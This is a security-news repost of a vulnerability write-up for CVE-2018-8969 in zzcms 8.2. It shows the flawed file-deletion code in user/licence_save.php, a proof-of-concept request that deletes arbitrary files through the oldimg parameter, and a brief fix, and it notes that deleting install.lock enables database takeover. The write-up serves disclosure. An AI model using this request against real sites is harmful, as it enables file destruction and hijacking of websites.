Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2018-8969: vulnerability/licence_save.php.md at master · Ni9htMar3/vulnerability

An issue was discovered in zzcms 8.2. user/licence_save.php allows remote attackers to delete arbitrary files via directory traversal sequences in the oldimg parameter in an action=modify request. This can be leveraged for database access by deleting install.lock.

CVE
#vulnerability#web#php#ruby

title

tags

grammar_cjkRuby

licence_save.php

bug

true

user/licence_save.php****Edition :

zzcms 8.2

Location

/user/licence_save.php

Code:

if ($oldimg<>$img && $oldimg<>"/image/nopic.gif"){ $f="…/".$oldimg; if (file_exists($f)){ unlink($f); } $fs="…/".str_replace(".","_small.",$oldimg).""; if (file_exists($fs)){ unlink($fs);
} }

Rows : 31****Harm

Allows attackers to delete files arbitrarily

Cause the cause

Through the code can know that we only control oldimg, and it did not carry out the appropriate filtering

first create test.php

Then perform the operation, remember to meet $oldimg<>$img && $oldimg<>"/image/nopic.gif"

Then execute

Then find test.php is gone

poc

GET: http://127.0.0.1:8080/user/licence_save.php?action=modify POST: id=11&oldimg=test.php&img=1231

An attacker can use this vulnerability to delete any file, such as deleting install.lock for CMS reinstall and hijacking the website database.

Solution

Can be filtered through the input of control parameters, strictly control the type of parameters, suffixes

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907